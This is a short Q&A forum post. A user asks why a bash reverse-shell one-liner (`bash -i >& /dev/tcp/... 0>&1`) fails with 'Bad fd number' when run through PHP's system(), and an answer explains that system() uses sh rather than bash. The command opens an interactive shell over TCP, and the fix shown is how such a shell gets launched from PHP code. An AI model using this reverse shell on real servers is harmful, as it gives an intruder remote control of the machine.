# php system "Syntax error: Bad fd number"

Tags: php, linux, sh

When I excute `bash -i >& /dev/tcp/127.0.01/12340 0>&1` through `system()` I get:

```
Syntax error: Bad fd number
```

[image]

But there is no error when I excute `bash -i >& /dev/tcp/127.0.01/12340 0>&1` through terminal.

[image]

How can i fix it?

Comment: Ummm... your first error is *`Syntax error: end of file unexpected`* (and not *`Syntax error: bad fd number`*). Perhaps you should copy/paste the actual messages rather than posting links to images.

Comment: Thank you for your suggestion!

Answer (score 1):

`/dev/tcp` is a feature of `bash`, however in your first screenshot in the PHP script you are using `sh`.

The solution is to actually use `bash` as you did in your local terminal.